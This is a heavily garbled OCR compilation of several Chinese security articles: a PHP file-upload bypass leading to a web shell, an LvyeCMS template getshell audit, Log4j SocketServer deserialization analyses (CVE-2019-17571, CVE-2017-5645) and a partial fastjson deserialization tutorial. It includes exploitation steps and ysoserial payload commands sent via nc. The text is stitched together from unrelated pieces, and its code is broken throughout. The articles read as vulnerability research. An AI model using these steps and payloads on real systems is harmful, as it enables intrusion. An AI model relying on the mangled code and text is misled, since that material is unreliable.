E ES t 
Bp NF BARE n 
” 
" ^ 
if (file exists["../Images/default/" . $newname)) 
echo $ FILES["file"]í"name"] . " already exists," 
echo "<script language-'3avascript'»alert( 
tr - E 一 my - 
f£') shastery.goi-1):</scripr>" 
else 
move uploaded file($ FILES["file"]["tmp name"), $image 





Snewnamel: // NFKA NIFE | 
以 上 代码 用 来 对 上 传 文件 进行 过 滤 及 存放 ， 但 因为 在 后 缀 名 的 验证 上 存在 问题 导致 漏洞 的 产生 
//RAE RAM 
$uptype = explode(".",$ FILES["file"][“name"]);//#O RE 
/ [* 
/7 验证 交 件 类 型 虽 ， 
$kugzm-stctolewer(end(Suptype));: 
if (preg match('/jpgljpeglgifipng|doc|xls|pdf|rar|zip|bmplico/i',$kuozm) B 
($ FILES["file"]["size"] > 1) 8& ($ FILES["file"]["size"] < 30240000)). 
T 
if ($_FILES["file"]["error"] > 6e): 
{+ 
// echo “Return Code: Soa $ FILES["file"]["error"] . “<br /»";« 
echo “<script language='javascript'>alert(' 上 传 失败 ,返回 重新 选择 
")sheskorxsBe(-1);</script>”;: 
可 以 看 到 程序 这 里 对 于 文件 的 后 组 进行 了 获取 并 且 验 证 ， 但 是 这 里 采用 的 是 preg_match() 函 数 ， 
思 就 是 说 只 要 后 缀 里 面 出 现 后 面 所 允许 的 文件 类 型 即 为 通过 ， 所 以 像 这 种 .atsjpgay、.yjnwrarai 等 
等 等 都 是 可 以 通过 的 。 
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a 


E. 


















eT d j EN 
存放 路 径 ， 

"$Jmagsurl-$ POST["imageurl];: 
$filed-$ POST["filed"]; 

gdname-$ POST["filedname"];: 


ta. 二 


eat Cet 


v 
ki 


Gf (test input($_POST["wname"])!==""){// 自 定义 文件 名 





mageur i 


* 


的 产生 。 "$newname-test input($ POST["wname"]).".".end($uptype); // 新 的 文件 


«! 


{+ 


$rand=rand(10,100);//hatlar- 


jozm) & $date = date("ymdhis").$rand;//Xzf* &: 时 间 + 随 机 数 。 
>) )s $newname=$date.".".end($uptype); 7/ 新 的 文件 名 ， 





ve 


MH:iexiezcG 


H if (file exists("../Images/default/" . $newname)): 
BU (c 
3 // echo $ FILES["file"]["name"] . " already exists.";: 

dH echo “<script language=' javascript'>alert(' 有 相同 文件 存在 

REXagQ( -1);«/script»";: 

| A 

If elses 

{+ 

8 move uploaded file($ FILES["file"]["tmp name"],$1mageurl.$newna 
AFSAR ， 

ioOST[wname'] 用 来 获取 用 户 传递 的 自 定义 文件 名 ， 这 期 间 对 于 文件 名 没有 进行 重 命名 而 
用 户 的 文件 名 来 命名 ， 所 以 由 此 结合 上 面 说 过 的 后 缀 验证 配合 Linux 文 件 名 解析 机 制 ， 即 


ERE, d 
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利用 方法 这 里 的 $_POST[wname'] 用 来 获取 用 户 传递 的 自 定义 文件 名 ， am FI a 
接 进行 了 命名 ， 所 以 由 此 结合 上 面 说 过 的 后 缀 验证 配合 Linux 文 件 名 解析 机 制 |， 即 可 getshel 





1. 进 入 后 全 点 击 参数 设置 
2. 点 击 上 传 
3. 在 弹出 的 页 面 中 自 定义 的 文件 名 需要 为 php 后 缀 的 脚本 名 


4. 在 下 方 的 选择 上 传 文件 中 应 选择 一 个 带 有 合法 文件 格式 的 长 文件 名 ， 需 要 是 Linux 系 统 不 能 识别 
格式 。 


这 个 文件 上 传 至 服务 器 后 的 名 称 将 是 : 1.php.jpgasdasd。 


由 于 Linux 遇 到 无 法 识别 的 文件 名 将 会 自动 往 前 进行 解析 ， 所 以 最 终 解析 的 格式 为 1.php 
TARH 





Mah Logo 1 j ] 
沽 io 图 标 j E 
访问 相应 文件 

obedit 
eens eee ponis ginet eee Ree fereare (uem (^w esr isa - d es Ami. Du Ü 
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Hit ZivyecmsaAgetshell 

gue inm, 发 现 有 目标 使 用 lvyecms 搭 建 网 站 ， 到 码 云 上 下 载 一 套 最 新 版 的 lvyecms 瞧 瞧 里 面 
有 只 能 利用 所 

pamit 


PREHEAT, 打开 phpstorm 查 看 源码 结构 


G [3 f" aconfigincphe -四 gpiny 


p3.2 的 风格 ， 直 接 进 Application 目 录 ， 查 看 存在 哪些 模块 


kph 


htaccess 


iil Application 
Bii Admin 
L Api 
Bii Attachment 
v Ra Controller 
© AdminController.class.php 
© AtadminController.class.php 
Q AttachmentsController.class.php 
Q UeditorControl 
Q UploadControll 
dL Model 
> Ra View 
> Bm Content 
> Da install 
ii Template 
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一 般 审计 时 ， 都 是 先 看 前 台 ， 再 看 后 
模块 ， STAREN RS, BR 


， 但 是 ， 这 个 cms 找 了 一 圈 之 后 


先 看 最 感 兴趣 的 Template 模 块 





在 Template 模 块 里 发 现 可 以 自 定义 页 面 ， 跟 进去 看 看 
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数据 写 进 数据 库 里 ， 然后 再 调用 createHtml 函 数 ， 这 个 跟 下 createHtml 函 数 ， 在 跟 进 createHtml 
P PLE 先 要 知道 $this->Html 这 个 方法 是 从 哪里 来 的 ， 跟 进 这 个 控制 器 的 父 类 查看 下 


的 人 类 中 也 没有 定义 ， 但 是 定义 了 _gel0 麻 太 方法 ， 在 麻 太 方法 四 先 凋 记 了 父 类 的 get 的 魔术 
敬重 这 个 类 的 父 类 是 TP 的 Controller 类 ， 他 的 get 方 法 只 是 获取 模板 显示 变量 的 值 ， 跳 过 这 个 进入 
cere 









跟 进 Components 类 中 的 getlnstance 方 法 ， 这 个 方法 一 般 都 是 实例 化 自身 对 象 
76 

77 ©; t ! f ( à y | 
78 

79 { 

80 ) 


这 个 类 中 也 定义 了 __get 魔 术 方 法 ， 最 终 进入 这 个 方法 


€ ( f 





} 


iD CO -J OY 一; 


i 


o 


先 判断 $name 是 不 是 类 中 数组 的 key， 如 果 是 ， 就 返回 一 个 相应 的 对 象 ， 这 里 $name 是 Htm|， 查 看 
下 数组 中 对 应 的 类 在 哪里 





完 从 数据 库 中 读 取 文件 信息 ， 然 后 直接 生成 ， 全 程 没有 过 滤 


tml， 查 看 
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漏洞 验证 


e> e 





[3 XE ED SR 





模板 管理 








localhost 


常用 网 址 Q 京东 高 城 


admins 


abcde php 
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9 localhost 
psami O Ewe 


ee ”模块 


localhost 


Re 新手 上 路 ORARE Qe 














PHP Version 5.5.38 


























Server API 


System Windows NT DESKTOP-B955963 6.2 build 9200 (Windows 8 Enterprise Edition) i585 
Build Date Jul 20 2016 11:08:49 

Compiler [MSVC11 (Visual C++ 2012) A 
Architecture 1x36 

Configure cscript /nologo configure js *--enable-snapshot-build" *--disable-isapi* "--enable- 
Command debug-pack" *--without-mssql" *--without-pdo-mssql* *--without-pi3web" "--with- 


pdo-oci=CAphp-sdk\oracle\x86\instantclient! 0\sdk,shared” *--with-oci8- CAphp- 
sdk\oracle\x86\instantclient10\sdk,shared” *--with-oci8-11g=C:\php-sdk\oracle 
\x86\instantclient11\sdk, shared" *--enable-object-out-dir- ./obj/* *--enable-com- 


dotnet shared" *--with-mcryptestatic" *--disable-static-analyze’ "--with-pgo” 





Apache 2.0 Handler 





Virtual Directory 
Support 


enabled 








Configuration - 
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peer 


C:\Windows 








这 套 源 码 前 台 没 有 找到 有 用 的 点 ， 也 没 进 到 后 台 - - ， 最 后 ， 祝 大 家 0day 多 多 ~ 





Log4j-Unserialize-Analysis 


0x01 概述 


12/20 的 时 候 就 看 到 i 这 个 反 序 列 化 漏洞 ， 看 了 眼影 响 版 本 1.2.4 <= Apache Lo 
1.2.17( 最 新 版 ) 。 心 想 这 个 组 件 用 的 人 很 多 啊 ， 几 乎 Java 开 发 的 系统 用 作 日 志 记 录 都 是 
但 是 深入 看 看 之 后 我 才 发 现 ， 这 年 底 了 原来 大 家 都 缺 kpi 啊 。 


0x02 漏洞 分 析 


看 了 有 眼 描述 ， 出 问题 的 是 SocketServer 这 个 类 ， 而 且 这 里 最 后 提 到 这 个 漏洞 最 初 被 一 个 
过 了 ，CVE 编 号 是 CVE-2017-5645 。 这 我 就 纳闷 了 ， 既 然 被 发 现 了 为 什么 还 申请 编号 。 








Description: 











Included in Log4j 1.2 is a SocketServer class that is vulnerable to 
deserialization of untrusted data which can be exploited to remotely 
execute arbitrary code when combined with à deserialization gadget 
when Listening to untrusted network traffic for log data. 





Mitigation: 

Apache Log4j 1.2 reached end of life in August 2015. Users should 
upgrade to Log4j 2.x which both addresses that vulnerability as well 
as numerous other issues in the previous versions. 


Credit: 





his issue was initially discovered in CVE-2017-5645 by Marcio Almeida 


ide Macedo of Red Team at Telstra. 


等 我 继续 深入 看 一 下 我 才 发 现 版 本 不 对 ， 类 名 不 对 ， 内 心 大 大 的 一 个 wtf (形容 一 件 事情 出 人 意 
令 人 惊叹 ， 所 以 下 面 分 开 来 看 看 这 两 个 洞 。 


CVE-2019-17571 


漏洞 环境 措 建 


第 一 种 方法 下 利用 下 面 的 方法 ， 在 JDK7u21 起 一 个 SocketServer 服 务 ， 即 可 通过 第 二 条 
洞 。 


java -cp /Users/link3r/Downloads/apache-10g4j-1.2.17/1094j-1.2.17.jar org. apachl 
» 


java -jar ysoserial-master-55fie7c35c-1.jar Jdk7u21 "open /System/Applications/f 
» 
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we SOrg.apache jog4j.net. SocketServer fet 
$4 org.apache.log4).net SocketServer T link3r.local: 
fprg.apache.log4;.net. SocketServer a 
lorg.apache.log4;.net SocketServer 
org apache.log4j.net SocketNode 
Jorg.apache log4;.net SocketServer 
org apache .iog4j.net.SocketServer 


jorg.apache.jog4) net. SocketServer 


jorg.apache .log4} net SocketServer 





)g4j <= 
这 个 组 人 


jorg.apache.log4;.net.SocketServer 


pce pom. xml 文件 引入 一 个 gadget 依赖 ， 以 及 漏洞 版 本 。 


//pom. xml 
<i -- https://mvnrepository.com/artifact/log4j/log4j --> 


<dependency> 
«groupId»10g4j«/groupId» 
<artifactId>log4j</artifactId> 


1 
AS 





"EI 
«version»1.2.17«/version» 
«/dependency» 
<!-- https://mvnrepository.com/artifact/commons-collections/commons-coll 
«dependency» 
«groupId»commons-collections«/groupId» 
«artifactId»commons-collections«/artifactId» 
«version»3.i1«/version» 


«/dependency» 
E > 


WAZ org.apache.log4j.net.SimpleSocketServer 这 个 方法 中 通过 传 入 两 个 参数 ， 这 俩 个 参数 分 
Mem NSS, bU log4j 的 配置 文件 ， 就 可 以 创建 一 个 ServerSocket 对 象 等 待 通信 。 


main(String[] argv) { 
length == 2) { 
vial, argv[1}) 


wie Lis FRONS aes 
ocket serversocket = new Serversocket(port) 


) } 
socket = serverSocket. “accept 0); 
cat, info("¢ tt “ + socket. getInetAddress()); 
cat. info( je."); 
Thread( «ew St LogManager.getLoggerRepository()), e: "SimpleSocketServer-".+ port)).start(); 


eption var3) { 
ntStackTrace() 


init(String portStr, String configFile) ( 


port = Integer.parseintiportStr); 
(NumberFormatException 
var3. printo cocky hd 
usage( He j not interpret port number [" 4 portStr + 


(configFile. endswith( ; 
DOMConfigurator. configure( conf igF 


{ 
PropertyConfigurator.configure(configFile) ; 
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下 面 的 代码 是 基于 IDK 8u40 下 启动 的 。 


org.apache.1log4j.net.SimpleSocketServer ; 


String[] arguments = { ; 3; 
SimpleSocketServer.main(arguments) ; 


# Llnk3r@link3r.local: ~/Desktop/ 其 他 /工具 整理 /java 反 序列 化 利用 


-jar ysoserial-master-55f1e7c3 1.jar C onsCollections5 


Calculator. apt ' 123458] 





4 socketServer 启动 的 时 候 ， 我 们 通过 nc 发 送 漏洞 payload， 服 务 端 的 serverSocket.accept() # 
收 到 请 求 之 后 会 创建 一 个 线程 ， 处 理 SocketNode 这 个 类 。 


Socket (port) 


= Serveroocket. accept) 
D + socket.getlI 
cat. info( ) 
4 Thread} SocketNodel socket, LogManager.getLoggerfiepositoryl)) 
} 
(Exception var3) { 
var3.printStackTracel) 





跟 进 SocketNode 这 个 类 之 后 就 发 现 它 通过 BufferedinputStream 获取 到 通过 Socket 传 入 的 
payload 。 


SocketNode(Socket socket, LoggerRepository hierarchy) { 
Socket = socket 
«hierarchy = h 


YerediogutStremisorket-getinputStrea[))) ois: mull. socket: “Socket [addre/127.0.0.1, porteób147, 
m rInterruptedTOexceprtor ry r ? 
Thread. cucrentThreadl) .interrupt() 
logger.errort * socket, var4) 
> {IOException var5) 1 


logger.error( + socket, vars} 
(RuntimeException var) 着 
logger-error{ t + socket. varg} 





经 过 SocketNode 这 个 类 的 实例 化 ， 以 及 接收 到 payload 之 后 ， 这 里 有 个 new Thread().start() 的 
过 程 ， 也 就 是 说 这 个 线程 启动 。 
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(new Thread(new SocketNode(socket, LogManager.get LoggerRepository()), "SimpleSc 
(EE > 
£g Thread 方法 中 的 Runnable 对 象 正 是 实例 化 后 的 SocketNode 这 个 类 。 


publi { 
init ( , target, name, ©); 


然后 在 java.lang.Thread#run 会 调用 target.run() ， 而 这 里 的 target 对 象 正 是 SocketNode 这 个 
类 。 


emoteL 2 
accept() # remoteLogger 


vent = (LoggingEvent) .ois.readObject () 
remotelogger = | hierarchy. getLogger (event .getLoggerNane(] ) 
{ levent.getLevel(). isGreaterOrEqual( remoteLogger. getEffectiveLevel())}) 


remoteLogger.cal lAppenders (event) 


VE-2017-5645 
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| import java.io. IOException; r 
t java.io.ObjectInputStream; 

org.apache.logging.log4j.core.net.server.ObjectInputStreamLogEventę 
rt org.apache.logging.log4j.core.net.server .TcpSocketServer; 











pup í 
{ 
TcpSocketServer<ObjectInputStream> Log4jServer = null; 
{ 
Log4jServer = new TcpSocketServer ( , new ObjectInputStreamL 
j 
catch (IOException e) 
{ 
e.printStackTrace(); 
Il D 
WM Log4jServer.run(); 
d 
} 
I 
Il / /pom. xmi 
DM 
| <!-- https://mvnrepository.com/artifact/org.apache.logging.10g4j/109g4j-core = 


Il «dependency» 
Il | «groupId»org.apache.logging.log4j«/groupId» 
| <artifactId>log4j-core</artifactId> 
<version>2.8.1</version> 
</dependency> 
<!-- https://mvnrepository.com/artifact/org.apache.1logging.10og4j/1094] 
«dependency» 
«groupId»org.apache.logging.1log4j«/groupId» 
<artifactId>log4j-api</artifactId> 
<version>2.8.1</version> 
</dependency> 
<!-- https://mvnrepository.com/artifact/commons-collections/commons-CO 
<dependency> 
«groupId»commons-collections«/groupId» 
| <artifactId>commons-collections</artifactId> 
| <version>3.1</version> 
</dependency> 
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ng 
@) xetServer<ObjectInpu ae Vink3r-Local: ~/Desktop/X f& / RW HB / javai PF 


© java -jar ysoserial-master-55f1e7c35c-1. jar, CommonsColtections5 
% j4jServer = new Tepsi i As { nc 127.0.0.1 12345 





SEVEN Bri 3 
e; 


(IOException e} 





8j TcpSocketServer 对 象 的 时 候 ， 代 入 了 port( 端 口 变量 ) 以 及 
ObjectinputStreamLogEventBridge 对 象 ， 在 这 个 对 象 里 面 有 反 序 列 化 的 入 口 。 


eamLogEventBridge AbstractLogEventBridge«ObjectInputStream» { 
j 4 


ectinputStream inputStream, LogEventListener logEv 
tStr 

E eamLoggye LogEvent ) inputStream. readObject(1) 
ception var4) 1 
on(var4) 


eami InputStream inputSt ream) 
CinputSt ream) 





ZMA TcpSocketServerzrun 开始 运行 。 


int) 4 
age entry = + loggers traceEntry() 


isActive()) { 
.serverSocket, isClosed()) ( 


. logger. debug( } 
ket clientSocket = »serverSocket. accept() 
» logger .debug( sserverSocket) 

. logger .debug ( clientSocket) 
entSocket,setSoLinger( 9) 
SocketServer«T».SocketHandler handler = TcpSocketServer.SocketHandler(clientSocket]) 
„handlers. put(handler.getid(), handler) 

er.start(); 

(IOException var7) ( 
( .serverSocket,isClosed()) { 

.logger.traceExit(entry) 


»"serverSocket ) 


j-core Sam 





j4j/1og4j-*€ Irun; tr r3 vL Sc. ERIS TcpSocketServer 继承 于 AbstractSocketServer 。 
TcpSocketServer«T e InputStream» c s AbstractSocketServer«T» 1 
i1. ConcurrentMap«Long, TcpSocketServer<T>.SocketHandler> handlers; 
al ServerSocket serverSocket; 





而 这 个 AbstractSocketServer 抽象 类 继承 了 Runable 接口 ， Runable 接口 在 Thread 这 个 方法 作 
PISA avat rc hn. 所 以 实际 上 这 个 run 方 法 的 作用 就 是 把 客户 端 连 接 分 发 给 
ketHandler 进行 处 理 。 


mmons-cold 


— — — wr nan co 
AbstractSockétServer«T InputStream> ex LogEventListener ents Runnable { 


ot rey 


LogEventBridge<T> logEvent Input; 
| Logger, loggers 











E Socken RIRN 时 候 serverSocket.accept 会 接收 到 来 自 客户 端的 Socket 请 求 。 
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<serverSocket.accept(} 
erve 


epscketServer. Sockettand lérlclientSockwt)) clientSocket? "Sacket faddru/127 8 BUT porn... 





然后 TcpSocketServerz'SocketHandler 会 创建 一 个 新 的 ObjectinputStream 对 &, x1 pa 
是 我 们 客户 端 传 入 的 payload。 


{ 


.inputStream = TcpSocketServer. . logEvent Input .wrapStream( socke 


Clon 
ObjectInputStream(inputStream) ; 


ObjectinputStream wrapStream(InputStream inputStream) IOException { 


cs ObpectinputStream( InputStream):  inputStream: SocketInputStreamBI400 ' 





而 此 时 我 们 的 handler 对 象 正 是 我 们 的 线程 对 象 ， 也 就 是 说 实际 上 这 里 就 是 Thread.start， 而 线程 
对 象 里 面 的 是 TcpSocketServer 这 个 类 ， 所 以 这 里 start 后 执行 的 自然 是 TcpSocketServer 里 的 
run RX. 





反 序 列 化 的 过 程 中 TcpSocketServer#run 方法 里 TepSocketServer.this.logEventinput 对 象 实际 
上 就 是 我 们 前 面 最 开始 封装 的 ObjectinputStreamLogEventBridge 这 个 类 。 所 以 这 里 实际 上 调用 
855€ ObjectinputStreamLogEventBridge#logEvents 方法 。 


runt) { 


sage entry » TepSocketServer, (his. logger. trace£nt ey(] 
closed = 


{i Shutdown). 4 à \ 
TepSocketServer. t . logEvent Input togiventsi 
! [m 
closed 
i EXCEPTION vari) q^ y j 
TcpSocketServer, :, logger errori t t + varl@.eot + Lu M + varið. length, varie); 
而 在 ObjectInputStreamLogEventBridge#logEvents 方法 中 自然 就 看 到 了 我 们 的 反 序列 化 触发 
WO 


logEvents(ObjectInputStream inputStream, LogEventlistener logfventListener] throes IOException ( 
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a 







E 
Est s e PULS AES — RETE resolveClass 或 者 resolveProxyClass 处 进行 检查 ， 这 个 


守法 org.apache.logging.log4j.core.util.FilteredObjectInputStream.resolveClass ， 判 断 
22 org.apache.logging.log4j. 开头 。 


To 












R, VRARE 


ot "eam( sociae 


ption 


0x03 小 结 


Bemmmm, CVE-2019-17571 这 个 洞 可 以 说 是 混 kpi 了 ， 然 后 log4j 这 种 Tecp 分 布 式 传输 日 志 的 方式 蛮 
DRE, 利用 面 不 好 判断 ， 不 过 如 果 在 内 网 环境 下 可 能 有 一 定 的 利用 面 吧 。 





start, MAE 
tServer 里 的 





out 对 象 实际 


实际 上 调用 


列 化 触发 
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JAVA 反 序 列 化 - FastJson 组 件 


推荐 阅读 时 间 : 60min 


全 文字 数 : 14026 


前 


其 实 从 一 开始 就 是 想 着 学 一 下 fastjson 组 件 的 反 序列 化 。 结 果 发 现 完全 理解 不 能 。 


就 先 一 路 补 了 很 多 其 他 知识 点 ，RMI 反 序列 化 ，JNDI 注 入 ，7u21 链 等 (就 是 之 前 的 文章 ) ， : 
是 拖 了 很 长 时 间 ， 花 了 很 长 时 间 ， 总 算 把 这 篇 一 开始 就 想 写 的 文 ， 给 补 完 了 。 


类 似 的 文 是 已 经 有 了 不 少 ， 学 习 也 是 基于 前 辈 们 的 文章 一 步 步 走 来 ， 但 是 个 人 习惯 于 把 所 有 亲 
清楚 ， 讲 清楚 。 理 应 是 把 大 佬 们 的 文 要 细致 些 。 


本 文 需 要 前 置 知识 : JNDI 注 入 ，7u21 利 用 链 ， 可 以 戳 我 往 期 的 文章 。 
文章 内 容 如 下 : 


1. fastison 组 件 基础 介绍 及 使 用 (三 种 反 序列 化 形式 等 ) 

2. fastjson 组 件 的 @type 标 识 的 特性 说 明 (默认 调用 setter、getter 方 法 条 件 等 ) 。 

3. 分 析 了 fastjson 组 件 1.2.24 版 本 中 JNDI 注 入 利用 链 与 setter 参 数 巧妙 完美 适 配 (前 置 知识 参 
JNDI 注 入 一 文 ) 

4. 分 析 了 fastjson 组 件 1.2.24 版 本 中 JDK1.7Templateslmpl 利 用 链 的 漏洞 触发 点 poc 构 造 (前 
识 参 考 7u21 一 文 ) 

5. 分 析 了 1.2.24-1.2.46 版 本 每 个 版 本 迭代 中 修改 代码 ， 修 复 思路 和 绕 过 。 (此 时 由 于 默认 白 
的 引入 ， 漏 洞 危 害 大 降 ) 

6. 到 了 1.2.47 通 杀 黑 白 名 单 漏洞 ， 因 为 网 上 对 于 这 个 分 析 文 有 点 过 多 。 这 边 想 着 直接 正 向 来 ; 
意思 。 尝 试 从 代码 审计 漏洞 挖 握 的 角度 去 从 零 开 始 挖 掘 出 这 一 条 利用 链 。 最 后 发 现 产 生 了 
我 上 我 也 行 的 错觉 (当然 实际 上 只 是 一 种 错觉 ， 不 可 避免 受到 了 已 有 payload 的 引导 ， 但 是 
分 析 也 算是 不 会 对 大 佬 的 0day 产 生 一 种 畏惧 心理 ， 看 完 也 是 可 以 理解 的 ) 最 后 再 看 了 下 修复 


本 文 实 验 代码 均 上 传 ， 那 么 想 要 好 好 学 习 的 小 伙伴 请 打开 idea， 配 合 食用 。 


Lilt 












fastjson 组 件 


fastjson 组 件 是 阿里 巴巴 开发 的 反 序列 化 与 序列 化 组 件 ， 具 体 细节 可 以 参考 
组 件 api 使 用 方法 也 很 简洁 
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E. = JSON.toJSONString(obj); 
化 

= JSON.parse(); av 类 型 
= JSON.parseObject("{...}"); NObject3s8 
a JSON.parseObject("[...)", VO.class); FPR 
jdemo 来 使 用 一 下 这 个 组 件 

测试 均 是 基于 1.2.24 版 本 的 fastjson jar 包 

哇 需 要 存在 漏洞 的 jar 包 ， 但 是 在 github 上 通常 会 下 架 存 在 漏洞 的 jar 包 。 
从 maven 合 店 中 找到 所 有 版 本 jar 包 方便 漏洞 复 现 。 


son 组 件 使 用 
pE 序列 化 的 User 类 :  user.java 


ge com.fastjson; 


ublic String getN { 
L return name; 


BEIC void setName(String na { 
this.name = name; 


return age; 


Ublic Void int { 
this.age = age; 
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package com.fastjson; _ » 


rt com.alibaba.fastjson.JSON; 
t com.alibaba.fastjson.serializer.SerializerFeature; 





User useri = new User(); 
useri.setName( lala’); 
useri.setAge(::); 


String serializedStr = JSON.toJSONString(user1); 
System.out.println( ia dst *serializedStr); 





Object obj1 = JSON. AXXd aer e. 
System.out.println(': IRRE +obj1.getClass().getName()) 
System.out.println("parsek sot: "*obj1); 





Object obj2 = JSON. 人 
System.out ,println( pi & $E :"*-0bj2.getClass().getN 
System.out.println("parseObjectizI$50(5: "+0bj2); 









Object obj3 - JSON. 和 User.class); 
System.out.println("parseObject 列 化 iM: "+obj3.getClass().getN 
System.out.println("parsedbject RF 








ti 


以 上 使 用 了 三 种 形式 反 序列 化 结果 如 下 : 
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ie()); | 














m * 
f"ag ,"name' } 
But. 27 
反 序 列 化 对 象 名 称 : com. alibaba.fastjson.JSONObject 
We “Lala, “age yin} 


Object RIJEN RAP :com.alibaba.fastjson. JSONObject 
20 ject REIHE: { name" |" laia","age' T3) 

Pse0b jec! ! 

60bject 反 序列 化 对 象 名 称 :com. fastjson.User 

s0bject 反 序列 化 :com. fastjson.User@3d71d552 


Ibject( 了) 其 实 就 是 parse({.) 的 一 个 封装 ， 对 于 parse 的 结果 进行 一 次 结果 判定 然后 转化 为 





public static JSONObject 
Object obj = parse(text); 


return obj instanceof JSONObject ? (JSONObject)obj : (JSONObject)toJSON( 


Objecttfhclass) 好 像 会 调用 class 加 载 器 进行 类 型 转化 ， 但 这 个 细节 不 是 关键 ， 就 不 研究 了 
惠 反 序列 化 方式 除了 返回 结果 之 外 ， 还 有 哈 区 别 ? 
过 程 调用 函数 上 有 不 同 。 
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package com.fastjson; w ad 
import com,alibaba.fastjson. JSON; 
import java.io.IOException; 


lic String name; 
String age; 





public void { 
System.out.println( ‘nam ett: illed"); 
this.name - test; 


publi« oitring { 
System.out.println("name getter called"); 
return this.name; 


public String 1 
System.out.println("age getter called"); 
return this.age; 


public static void 1 
Object obj = JSON.parse("{\"@type\":\"com. fastjson.Fast)sonT 
System.out.println(obj); 


Object obj2 = JSON.parseObject("{\"@type\":\"com, fast 
System.out.println(obj2); 


Object obj3 = JSON.parseObject("{\"@type\":\"com. fast 
System.out.println(obj3); 


结果 如 下 : 
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ame 









JUSON . pa 
setter called 


Bastjson. Fast JsonTest@ a2e4553 
ON. p? 

setter called 

getter called 

getter called 


name 
P^ 7 ‘ } 


Mnane": "t 
FISON. p^ 
pame setter called 

Dppmfastjson.FastJsonTest@e2144e4 


结论 : 
parse(”) 会 识别 并 调用 目标 类 的 特定 setter 方 ; 
: 方法 及 某 些 特定 条 ; 
Va E 些 特定 条 件 的 getter 757 
E. E. 会 调用 反 序 列 化 目标 类 的 特定 setter 和 getter 方法 ae i 
setter, 个 人 测试 返回 String 的 setter 是 不 行 的 ， 此 处 打 个 问号 ) en 
* parseObject("" 会 i ys R 
parseObject("",class) 会 识别 并 调用 目标 类 的 特定 setter 方法 及 某 些 特定 条 件 的 A 
些 特定 条 件 的 getter 方法 


特定 的 setter 和 getter 的 调用 都 是 在 解析 3 
j a 在 解析 过 程 中 的 调 
Maz Est) 是 过 程 中 的 调用 。 (具体 是 哪些 setter 和 getter 会 被 调用 ， 我 们 


¥ y Y +>” Ostatic 
» Qe 





之 所 以 

parseObject("")& [x 5! ab ES 3 

tna 别 就 是 因为 parseObject("" 

中 会 对 所 有 getter 进 行 调用 。 eObject(”") 比 起 其 他 方式 多 了 一 步 toJSON 操 作 ， 在 这 
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@type 


那么 除开 正常 的 序列 化 ， 反 序列 化 。 fastjson 提 供 特殊 字符 段 etype , KPFRALUSE RAI 


任意 类 ， 并 且 会 自动 调用 类 中 属性 的 特定 的 set，get 方 法 。 
我 们 先 来 看 一 下 这 个 字段 的 使 用 


String 
System. 


Object 
System. 
System. 


Object 
System. 
System. 


serializedStri = JSON. toJSONString(user1, SerializerFeature.writeClassName 
out. printin( *serializedStr1); 


0bj4 = JSON.parse(serializedStr1i); 


out.printin( +obj4.getClass().getName()); 
out.printin( *obj4); 


obj5 = JSON.parseObject(serializedStr1); 


out, printin( +obj5.getClass().getName()); 
out.printin( *0bj5); 
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JF ly 

spializedstr1={ : à M" | : 
parses 

由 ae 反 序列 化 对 象 名 称 :com. fastjson.User 

ee0bject 反 序列 化 :com. fastjson.User@icf4f579 

pars 

se0bject 反 序列 化 对 象 名 称 :com.alibaba.fastjson.JSONObject 

Fse0bject 反 序列 化 : { : : :11) 


和 调试 的 时 候 ， 可 以 看 到 ， 本 该 解析 出 来 的 @type 都 没有 解析 出 来 


lizedStr1 = 






定 反 序 列 化 


以 我 们 可 以 知道 当 @type 输 入 的 时 候 会 特殊 解析 (不 然 的 话 会 有 @type: com.fastjson.User 的 键 
EM) ， 那 么 自动 调用 其 特定 的 Set，get 方 法 怎么 说 呢 ? 
黎 们 先 建立 一 个 序列 化 实验 用 的 Person 类 

P erson.java 


>lassName 


Z 
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package com.fastjson; decus 


import java.util.Properties; 
public class 1 
public String name; 
private String full name; 


int age; 
private Boolean sex; 


private 


private Properties prop; 


public 


System.out 


public void 
System.out 
this,age = 


public Boolean 
System. out 


{ 


,println("Person 构 造 函 数 


int { 
.printin("setAge()"); 
age; 


1 
.printlin( 





return this.sex; 


public Properties getP! "n 
System.out.println("getProp()"); 
return this.prop; 


public String { 


String s = "[Pe " + this.name + " full _name=" 





return s; 


@type 反 序列 化 实验 : 
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som. fastjson; "— i 3 EN 
om. alibaba.fastjson. JSON; 
ass type { 


Ge static void t { 


"@type\":\"com.fastjson.Person\", \"name\":\"lala\", 


= JSON.parseObject(eneity3,Person.class); 


"System.out.println(obj); 


Object] name-lala full name-null, age-13, prop=null, sex=null 


name 反 序列 化 成 功 

full name 反 序 列 化 失败 
age setAge 函 数 被 调用 

Sex getsex 函 数 没有 被 调用 

e prop getpropÃ šč 573 FB 


修饰 符 的 属性 会 进行 反 序列 化 赋值 ，private 修 饰 符 的 属性 不 会 直接 进行 反 序列 化 赋值 ， 
调用 setxxx(xxx 为 属性 名 ) 的 函数 进行 赋值 。 
Xx(Xxx 为 属性 名 ) 的 函数 会 根据 函数 返回 值 的 不 同 ， 而 选择 被 调用 或 不 被 调用 


Setget 函 数 是 否 将 被 调用 的 代码 最 终 
Libaba.fast json.util. JavaBeanInfo#build 函数 处 
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在 进入 build 函 数 后 会 遍历 一 遍 传 入 class 的 所 有 方法 ， 去 寻找 满足 set 开 头 的 特定 类 型 方法 ; BN 
一 遍 所 有 方法 去 寻找 get 开 头 的 特定 类 型 的 方法 


Name = qetNe 


artsWitht 5-9) 4^ methodvane: "setAge" 
et charAt(3) 


me,.« 


set 开 头 的 方法 要 求 如 下 : 


。 方法 名 长 度 大 于 4 且 以 set 开 头 ， 且 第 四 个 字母 要 是 大 写 
。 非 静态 方法 

。 返回 类 型 为 void 或 当前 类 

。 参数 个 数 为 1 个 


寻找 到 符合 要 求 的 set 开 头 的 方法 后 会 根据 一 定 规则 提取 方法 名 后 的 变量 名 (好 像 会 过 滤 _， 就 是 
set_name 这 样 的 方法 名 中 的 下 划 线 会 被 略 过 ， 得 到 name) 。 再 去 跟 这 个 类 的 属性 去 比 对 有 没有 这 
个 名 称 的 属性 。 


如 果 没 有 这 个 属性 并 且 这 个 set 方 法 的 输入 是 一 个 布尔 型 是 boolean 类 型 ， 不 是 Boolean 类 型 ， 这 


两 个 是 不 一 样 的 ) ， 会 重新 给 属性 名 前 面 如 上 is， 再 取 头 两 个 字符 ， 第 一 个 字符 为 大 写 ( 即 
isNa) ， 去 寻找 这 个 属性 名 。 
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et 开头 的 方法 要 求 如 下 : 
e 方法 名 长 度 大 于 等 于 4 

* 非 静态 方法 

En Uget#AB A445 BEA AS 

o TRASH 

Me REXER A Collection Map AtomicBoolean Atomicinteger AtomicLong 


